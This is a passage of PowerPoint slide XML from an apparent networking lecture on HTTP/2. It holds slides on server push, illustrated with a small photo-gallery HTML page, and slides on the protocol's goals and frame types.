                        <p:par>
                          <p:cTn id="53" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="54" presetID="22" presetClass="entr" presetSubtype="1" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="55" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="1030"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(up)">
                                      <p:cBhvr>
                                        <p:cTn id="56" dur="5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A9C2-5CCF-4C08-D5C6-B4373530F775}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Server Push Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{181B7820-3B75-2091-7939-7BEFD682C7AB}"/>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77</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="10" name="Group 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B0E1AC8-0E82-2E1E-2D09-626C45CEA3E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="203200" y="1905988"/>
            <a:ext cx="8478983" cy="4471060"/>
            <a:chOff x="1193470" y="2018805"/>
            <a:chExt cx="9666514" cy="4471060"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="Rectangle 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7F484CD-AAE5-B81A-38A8-7974EE7C3191}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1193470" y="2018805"/>
              <a:ext cx="9666514" cy="447106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7054D56-FC90-04A8-AF74-E32CD72F3E2D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2757172" y="2075212"/>
              <a:ext cx="6512035" cy="584775"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="3200" b="1" u="sng" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>My Awesome Photo Gallery</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="11" name="Group 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA21EF51-0A9D-9D5B-F670-C9A1771F6145}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="362529" y="3057852"/>
            <a:ext cx="8136577" cy="2808557"/>
            <a:chOff x="2101932" y="3170669"/>
            <a:chExt cx="8136577" cy="2808557"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="Rectangle 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A0C57C3-A718-804A-83AE-B6230FBA2257}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2101932" y="3170712"/>
              <a:ext cx="2422567" cy="2808514"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent5">
                <a:lumMod val="60000"/>
                <a:lumOff val="40000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:ln w="57150">
              <a:solidFill>
                <a:schemeClr val="bg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C73787-D7F7-A0EA-5A4D-7CA148286E77}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4958937" y="3170669"/>
              <a:ext cx="2422567" cy="2808514"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent5">
                <a:lumMod val="60000"/>
                <a:lumOff val="40000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:ln w="57150">
              <a:solidFill>
                <a:schemeClr val="bg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2636002-BEA8-C9D2-1BFD-718A62DF0BEF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7815942" y="3170669"/>
              <a:ext cx="2422567" cy="2808514"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent5">
                <a:lumMod val="60000"/>
                <a:lumOff val="40000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:ln w="57150">
              <a:solidFill>
                <a:schemeClr val="bg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Shape 357">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27215ABE-57EA-4FD5-657A-E0ACA512E3C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8933543" y="2404592"/>
            <a:ext cx="3101673" cy="31530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C79C24"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>&lt;!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C79C24"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>doctype</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C79C24"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t> html&gt;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&lt;html&gt;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&lt;body&gt;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&lt;h1&gt;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My Awesome Photo Gallery</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E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="35A327"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>&lt;/h1&gt;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“cat1.jpg"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="35A327"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>&gt;&lt;/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“cat2.jpg"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="35A327"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>&gt;&lt;/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&gt;</a:t>
            </a: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    &lt;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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="A09F25"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A09F25"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D7391E"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>“cat3.jpg"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="35A327"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>&gt;&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="35A327"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="35A327"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>&gt;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&lt;/body&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="3E3E3E"/>
              </a:solidFill>
              <a:latin typeface="Menlo"/>
              <a:ea typeface="Menlo"/>
              <a:cs typeface="Menlo"/>
              <a:sym typeface="Menlo"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="241093">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="187517" algn="l"/>
                <a:tab pos="375034" algn="l"/>
                <a:tab pos="562550" algn="l"/>
                <a:tab pos="750067" algn="l"/>
                <a:tab pos="937584" algn="l"/>
                <a:tab pos="1125101" algn="l"/>
                <a:tab pos="1312617" algn="l"/>
                <a:tab pos="1500134" algn="l"/>
                <a:tab pos="1687651" algn="l"/>
                <a:tab pos="1875168" algn="l"/>
                <a:tab pos="2062684" algn="l"/>
                <a:tab pos="2250201" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="35A327"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>&lt;/html&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D5263E9E-CCB5-0A52-C81D-057AB8888E04}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="869933" y="4138942"/>
            <a:ext cx="1407758" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>10 MB</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B92FDD3A-D31F-E501-B948-D1840F607754}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3916745" y="4138941"/>
            <a:ext cx="1051891" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>5 KB</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4FFE098D-B0E0-DDB4-0E48-241CAC13A659}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6760887" y="4138940"/>
            <a:ext cx="1051891" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>1 KB</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="CDN media">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0292F33B-9254-66B3-E66D-1A69E2B05A1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43" r="25573"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6076539" y="3057852"/>
            <a:ext cx="2422567" cy="28085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8EA0BCA-6531-D8D1-573D-7540899F2A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14" r="15281"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3219534" y="3057851"/>
            <a:ext cx="2422568" cy="28085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E16FAFC-CD17-EFBF-8D7B-B09E47A1F2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129" r="8144"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="362528" y="3057850"/>
            <a:ext cx="2422568" cy="2808516"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Speech Bubble: Rectangle 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA785755-E6BB-76AA-CA61-D81A95DB2F7F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8933543" y="1082400"/>
            <a:ext cx="3018586" cy="2209800"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -6021"/>
              <a:gd name="adj2" fmla="val 86432"/>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t>Idea: server knows all three images will be downloaded. Why wait for the client to request them?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28990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up)">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="250"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1026"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="15" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="250"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="16" presetID="22" presetClass="entr" presetSubtype="1" fill="hold" nodeType="after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up)">
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="750"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1028"/>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wipe(up)">
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="5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259A-E561-33BA-A62C-1B8841795AA5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Goals of HTTP 2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0DFB7623-80BA-14C5-E65D-EF3A02B98575}"/>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78</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B36B254F-08FB-A9C0-947B-9F2544218F7C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Enable clients to upgrade connections from HTTP 1.1 to HTTP 2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Maintain backward compatibility with HTTP 1.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Methods, status codes, typical headers, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Binary, compressed encoding for HTTP headers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Multiplex multiple requests/responses in parallel over a single socket</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To deal with head-of-line blocking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Mechanism for server push</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16562496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B081A-5F7D-6D2E-EC51-0C8223AACE4C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Protocol Semantics</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91E51330-A09E-D9A1-190F-06D8F94D5597}"/>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79</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C0B7434-1AB4-BFF0-4F9B-B2CA8539885A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTTP 2 is a framed protocol</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>All “messages” have a frame type and a length</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Frame type determines how to interpret the contents of the message</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Frame Types</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SETTINGS – contains the configuration details for a new HTTP 2 connection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HEADERS – initiates a new request from the client</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Referred to as a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>stream</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Contains the HTTP method, path, and headers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Each request is assigned a random ID</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PUSH_PROMISE – preemptively send a response to the client</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DATA – contains data associated with a request ID</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>WINDOW_UPDATE – flow control information for streams</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="244174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4162" y="266953"/>
            <a:ext cx="6674168" cy="6309266"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="548640"/>
            <a:ext cx="1361270" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>1992:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18662746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D576-9470-4EB1-6A43-10FBC25550E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTTP Connection Establishment</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
